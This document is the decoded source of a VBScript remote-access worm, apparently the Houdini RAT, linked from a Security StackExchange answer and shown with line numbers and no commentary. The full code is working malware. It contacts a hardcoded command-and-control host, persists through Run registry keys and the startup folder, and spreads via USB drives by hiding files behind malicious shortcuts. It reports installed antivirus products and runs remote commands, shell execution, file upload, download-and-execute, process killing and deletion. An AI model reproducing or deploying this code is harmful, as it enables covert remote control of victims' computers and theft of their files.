Decoded - https://security.stackexchange.com/a/61228/13154

1. '<[ recoder : houdini (c) skype : houdini-fx ]>
2.  
3.  
4.  
5. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6.  
7.  
8.  
9. host = "al-ahlii17.no-ip.org"
10.  
11. port = 1155
12.  
13. installdir = "%temp%"
14.  
15. lnkfile = true
16.  
17. lnkfolder = true
18.  
19.  
20.  
21. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
22.  
23.  
24.  
25. dim shellobj
26.  
27. set shellobj = wscript.createobject("wscript.shell")
28.  
29. dim filesystemobj
30.  
31. set filesystemobj = createobject("scripting.filesystemobject")
32.  
33. dim httpobj
34.  
35. set httpobj = createobject("msxml2.xmlhttp")
36.  
37.  
38.  
39.  
40.  
41. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
42.  
43.  
44.  
45. installname = wscript.scriptname
46.  
47. startup = shellobj.specialfolders ("startup") & "\"
48.  
49. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
50.  
51. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
52.  
53. spliter = "<" & "|" & ">"
54.  
55. sleep = 5000
56.  
57. dim response
58.  
59. dim cmd
60.  
61. dim param
62.  
63. info = ""
64.  
65. usbspreading = ""
66.  
67. startdate = ""
68.  
69. dim oneonce
70.  
71.  
72.  
73. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
74.  
75. on error resume next
76.  
77.  
78.  
79.  
80.  
81. instance
82.  
83. while true
84.  
85.  
86.  
87. install
88.  
89.  
90.  
91. response = ""
92.  
93. response = post ("is-ready","")
94.  
95. cmd = split (response,spliter)
96.  
97. select case cmd (0)
98.  
99. case "excecute"
100.  
101.       param = cmd (1)
102.  
103.       execute param
104.  
105. case "update"
106.  
107.       param = cmd (1)
108.  
109.       oneonce.close
110.  
111.       set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
112.  
113.       oneonce.write param
114.  
115.       oneonce.close
116.  
117.       shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
118.  
119.       wscript.quit
120.  
121. case "uninstall"
122.  
123.       uninstall
124.  
125. case "send"
126.  
127.       download cmd (1),cmd (2)
128.  
129. case "site-send"
130.  
131.       sitedownloader cmd (1),cmd (2)
132.  
133. case "recv"
134.  
135.       param = cmd (1)
136.  
137.       upload (param)
138.  
139. case  "enum-driver"
140.  
141.       post "is-enum-driver",enumdriver  
142.  
143. case  "enum-faf"
144.  
145.       param = cmd (1)
146.  
147.       post "is-enum-faf",enumfaf (param)
148.  
149. case  "enum-process"
150.  
151.       post "is-enum-process",enumprocess  
152.  
153. case  "cmd-shell"
154.  
155.       param = cmd (1)
156.  
157.       post "is-cmd-shell",cmdshell (param)  
158.  
159. case  "delete"
160.  
161.       param = cmd (1)
162.  
163.       deletefaf (param)
164.  
165. case  "exit-process"
166.  
167.       param = cmd (1)
168.  
169.       exitprocess (param)
170.  
171. case  "sleep"
172.  
173.       param = cmd (1)
174.  
175.       sleep = eval (param)        
176.  
177. end select
178.  
179.  
180.  
181. wscript.sleep sleep
182.  
183.  
184.  
185. wend
186.  
187.  
188.  
189.  
190.  
191. sub install
192.  
193. on error resume next
194.  
195. dim lnkobj
196.  
197. dim filename
198.  
199. dim foldername
200.  
201. dim fileicon
202.  
203. dim foldericon
204.  
205.  
206.  
207. upstart
208.  
209. for each drive in filesystemobj.drives
210.  
211.  
212.  
213. if  drive.isready = true then
214.  
215. if  drive.freespace  > 0 then
216.  
217. if  drive.drivetype  = 1 then
218.  
219.     filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
220.  
221.     if  filesystemobj.fileexists (drive.path & "\" & installname)  then
222.  
223.         filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
224.  
225.     end if
226.  
227.     for each file in filesystemobj.getfolder( drive.path & "\" ).Files
228.  
229.         if not lnkfile then exit for
230.  
231.         if  instr (file.name,".") then
232.  
233.             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
234.  
235.                 file.attributes = 2+4
236.  
237.                 if  ucase (file.name) <> ucase (installname) then
238.  
239.                     filename = split(file.name,".")
240.  
241.                     set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
242.  
243.                     lnkobj.windowstyle = 7
244.  
245.                     lnkobj.targetpath = "cmd.exe"
246.  
247.                     lnkobj.workingdirectory = ""
248.  
249.                     lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
250.  
251.                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
252.  
253.                     if  instr (fileicon,",") = 0 then
254.  
255.                         lnkobj.iconlocation = file.path
256.  
257.                     else
258.  
259.                         lnkobj.iconlocation = fileicon
260.  
261.                     end if
262.  
263.                     lnkobj.save()
264.  
265.                 end if
266.  
267.             end if
268.  
269.         end if
270.  
271.     next
272.  
273.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
274.  
275.         if not lnkfolder then exit for
276.  
277.         folder.attributes = 2+4
278.  
279.         foldername = folder.name
280.  
281.         set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
282.  
283.         lnkobj.windowstyle = 7
284.  
285.         lnkobj.targetpath = "cmd.exe"
286.  
287.         lnkobj.workingdirectory = ""
288.  
289.         lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
290.  
291.         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
292.  
293.         if  instr (foldericon,",") = 0 then
294.  
295.             lnkobj.iconlocation = folder.path
296.  
297.         else
298.  
299.             lnkobj.iconlocation = foldericon
300.  
301.         end if
302.  
303.         lnkobj.save()
304.  
305.     next
306.  
307. end If
308.  
309. end If
310.  
311. end if
312.  
313. next
314.  
315. err.clear
316.  
317. end sub
318.  
319.  
320.  
321. sub uninstall
322.  
323. on error resume next
324.  
325. dim filename
326.  
327. dim foldername
328.  
329.  
330.  
331. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
332.  
333. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
334.  
335. filesystemobj.deletefile startup & installname ,true
336.  
337. filesystemobj.deletefile wscript.scriptfullname ,true
338.  
339.  
340.  
341. for  each drive in filesystemobj.drives
342.  
343. if  drive.isready = true then
344.  
345. if  drive.freespace  > 0 then
346.  
347. if  drive.drivetype  = 1 then
348.  
349.     for  each file in filesystemobj.getfolder ( drive.path & "\").files
350.  
351.          on error resume next
352.  
353.          if  instr (file.name,".") then
354.  
355.              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
356.  
357.                  file.attributes = 0
358.  
359.                  if  ucase (file.name) <> ucase (installname) then
360.  
361.                      filename = split(file.name,".")
362.  
363.                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
364.  
365.                  else
366.  
367.                      filesystemobj.deletefile (drive.path & "\" & file.name)
368.  
369.                  end If
370.  
371.              else
372.  
373.                  filesystemobj.deletefile (file.path)
374.  
375.              end if
376.  
377.          end if
378.  
379.      next
380.  
381.      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
382.  
383.          folder.attributes = 0
384.  
385.      next
386.  
387. end if
388.  
389. end if
390.  
391. end if
392.  
393. next
394.  
395. wscript.quit
396.  
397. end sub
398.  
399.  
400.  
401. function post (cmd ,param)
402.  
403.  
404.  
405. post = param
406.  
407. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
408.  
409. httpobj.setrequestheader "user-agent:",information
410.  
411. httpobj.send param
412.  
413. post = httpobj.responsetext
414.  
415. end function
416.  
417.  
418.  
419. function information
420.  
421. on error resume next
422.  
423. if  inf = "" then
424.  
425.     inf = hwid & spliter
426.  
427.     inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
428.  
429.     inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
430.  
431.  
432.  
433.     set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
434.  
435.     set os = root.execquery ("select * from win32_operatingsystem")
436.  
437.     for each osinfo in os
438.  
439.        inf = inf & osinfo.caption & spliter  
440.  
441.        exit for
442.  
443.     next
444.  
445.     inf = inf & "plus" & spliter
446.  
447.     inf = inf & security & spliter
448.  
449.     inf = inf & usbspreading
450.  
451.     information = inf  
452.  
453. else
454.  
455.     information = inf
456.  
457. end if
458.  
459. end function
460.  
461.  
462.  
463.  
464.  
465. sub upstart ()
466.  
467. on error resume Next
468.  
469.  
470.  
471. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
472.  
473. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
474.  
475. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
476.  
477. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
478.  
479.  
480.  
481. end sub
482.  
483.  
484.  
485.  
486.  
487. function hwid
488.  
489. on error resume next
490.  
491.  
492.  
493. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
494.  
495. set disks = root.execquery ("select * from win32_logicaldisk")
496.  
497. for each disk in disks
498.  
499.     if  disk.volumeserialnumber <> "" then
500.  
501.         hwid = disk.volumeserialnumber
502.  
503.         exit for
504.  
505.     end if
506.  
507. next
508.  
509. end function
510.  
511.  
512.  
513.  
514.  
515. function security
516.  
517. on error resume next
518.  
519.  
520.  
521. security = ""
522.  
523.  
524.  
525. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
526.  
527. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
528.  
529. for each objitem in colitems
530.  
531.     versionstr = split (objitem.version,".")
532.  
533. next
534.  
535. versionstr = split (colitems.version,".")
536.  
537. osversion = versionstr (0) & "."
538.  
539. for  x = 1 to ubound (versionstr)
540.  
541.      osversion = osversion &  versionstr (i)
542.  
543. next
544.  
545. osversion = eval (osversion)
546.  
547. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
548.  
549.  
550.  
551. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
552.  
553. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
554.  
555.  
556.  
557. for each objantivirus in colantivirus
558.  
559.     security  = security  & objantivirus.displayname & " ."
560.  
561. next
562.  
563. if security  = "" then security  = "nan-av"
564.  
565. end function
566.  
567.  
568.  
569.  
570.  
571. function instance
572.  
573. on error resume next
574.  
575.  
576.  
577. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
578.  
579. if usbspreading = "" then
580.  
581.    if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
582.  
583.       usbspreading = "true - " & date
584.  
585.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
586.  
587.    else
588.  
589.       usbspreading = "false - " & date
590.  
591.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
592.  
593.  
594.  
595.    end if
596.  
597. end If
598.  
599.  
600.  
601.  
602.  
603.  
604.  
605. upstart
606.  
607. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
608.  
609. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
610.  
611. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
612.  
613.     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
614.  
615.     wscript.quit
616.  
617. end If
618.  
619. err.clear
620.  
621. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
622.  
623. if  err.number > 0 then wscript.quit
624.  
625. end function
626.  
627.  
628.  
629.  
630.  
631. sub sitedownloader (fileurl,filename)
632.  
633.  
634.  
635. strlink = fileurl
636.  
637. strsaveto = installdir & filename
638.  
639. set objhttpdownload = createobject("msxml2.xmlhttp" )
640.  
641. objhttpdownload.open "get", strlink, false
642.  
643. objhttpdownload.send
644.  
645.  
646.  
647. set objfsodownload = createobject ("scripting.filesystemobject")
648.  
649. if  objfsodownload.fileexists (strsaveto) then
650.  
651.     objfsodownload.deletefile (strsaveto)
652.  
653. end if
654.  
655.  
656.  
657. if objhttpdownload.status = 200 then
658.  
659.    dim  objstreamdownload
660.  
661.    set  objstreamdownload = createobject("adodb.stream")
662.  
663.    with objstreamdownload
664.  
665.         .type = 1
666.  
667.         .open
668.  
669.         .write objhttpdownload.responsebody
670.  
671.         .savetofile strsaveto
672.  
673.         .close
674.  
675.    end with
676.  
677.    set objstreamdownload = nothing
678.  
679. end if
680.  
681. if objfsodownload.fileexists(strsaveto) then
682.  
683.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
684.  
685. end if
686.  
687. end sub
688.  
689.  
690.  
691. sub download (fileurl,filedir)
692.  
693.  
694.  
695. if filedir = "" then
696.  
697.    filedir = installdir
698.  
699. end if
700.  
701.  
702.  
703. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
704.  
705. set objhttpdownload = createobject("msxml2.xmlhttp")
706.  
707. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
708.  
709. objhttpdownload.send ""
710.  
711.      
712.  
713. set objfsodownload = createobject ("scripting.filesystemobject")
714.  
715. if  objfsodownload.fileexists (strsaveto) then
716.  
717.     objfsodownload.deletefile (strsaveto)
718.  
719. end if
720.  
721. if  objhttpdownload.status = 200 then
722.  
723.     dim  objstreamdownload
724.  
725.     set  objstreamdownload = createobject("adodb.stream")
726.  
727.     with objstreamdownload
728.  
729.          .type = 1
730.  
731.          .open
732.  
733.          .write objhttpdownload.responsebody
734.  
735.          .savetofile strsaveto
736.  
737.          .close
738.  
739.     end with
740.  
741.     set objstreamdownload  = nothing
742.  
743. end if
744.  
745. if objfsodownload.fileexists(strsaveto) then
746.  
747.    shellobj.run objfsodownload.getfile (strsaveto).shortpath
748.  
749. end if
750.  
751. end sub
752.  
753.  
754.  
755.  
756.  
757. function upload (fileurl)
758.  
759.  
760.  
761. dim  httpobj,objstreamuploade,buffer
762.  
763. set  objstreamuploade = createobject("adodb.stream")
764.  
765. with objstreamuploade
766.  
767.      .type = 1
768.  
769.      .open
770.  
771.      .loadfromfile fileurl
772.  
773.      buffer = .read
774.  
775.      .close
776.  
777. end with
778.  
779. set objstreamdownload = nothing
780.  
781. set httpobj = createobject("msxml2.xmlhttp")
782.  
783. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
784.  
785. httpobj.send buffer
786.  
787. end function
788.  
789.  
790.  
791.  
792.  
793. function enumdriver ()
794.  
795.  
796.  
797. for  each drive in filesystemobj.drives
798.  
799. if   drive.isready = true then
800.  
801.      enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
802.  
803. end if
804.  
805. next
806.  
807. end Function
808.  
809.  
810.  
811. function enumfaf (enumdir)
812.  
813.  
814.  
815. enumfaf = enumdir & spliter
816.  
817. for  each folder in filesystemobj.getfolder (enumdir).subfolders
818.  
819.      enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
820.  
821. next
822.  
823.  
824.  
825. for  each file in filesystemobj.getfolder (enumdir).files
826.  
827.      enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
828.  
829.  
830.  
831. next
832.  
833. end function
834.  
835.  
836.  
837.  
838.  
839. function enumprocess ()
840.  
841.  
842.  
843. on error resume next
844.  
845.  
846.  
847. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
848.  
849. set colitems = objwmiservice.execquery("select * from win32_process",,48)
850.  
851.  
852.  
853. dim objitem
854.  
855. for each objitem in colitems
856.  
857.     enumprocess = enumprocess & objitem.name & "|"
858.  
859.     enumprocess = enumprocess & objitem.processid & "|"
860.  
861.     enumprocess = enumprocess & objitem.executablepath & spliter
862.  
863. next
864.  
865. end function
866.  
867.  
868.  
869. sub exitprocess (pid)
870.  
871. on error resume next
872.  
873.  
874.  
875. shellobj.run "taskkill /F /T /PID " & pid,7,true
876.  
877. end sub
878.  
879.  
880.  
881. sub deletefaf (url)
882.  
883. on error resume next
884.  
885.  
886.  
887. filesystemobj.deletefile url
888.  
889. filesystemobj.deletefolder url
890.  
891.  
892.  
893. end sub
894.  
895.  
896.  
897. function cmdshell (cmd)
898.  
899.  
900.  
901. dim httpobj,oexec,readallfromany
902.  
903.  
904.  
905. set oexec = shellobj.exec ("%comspec% /c " & cmd)
906.  
907. if not oexec.stdout.atendofstream then
908.  
909.    readallfromany = oexec.stdout.readall
910.  
911. elseif not oexec.stderr.atendofstream then
912.  
913.    readallfromany = oexec.stderr.readall
914.  
915. else
916.  
917.    readallfromany = ""
918.  
919. end if
920.  
921.  
922.  
923. cmdshell = readallfromany
924.  
925. end function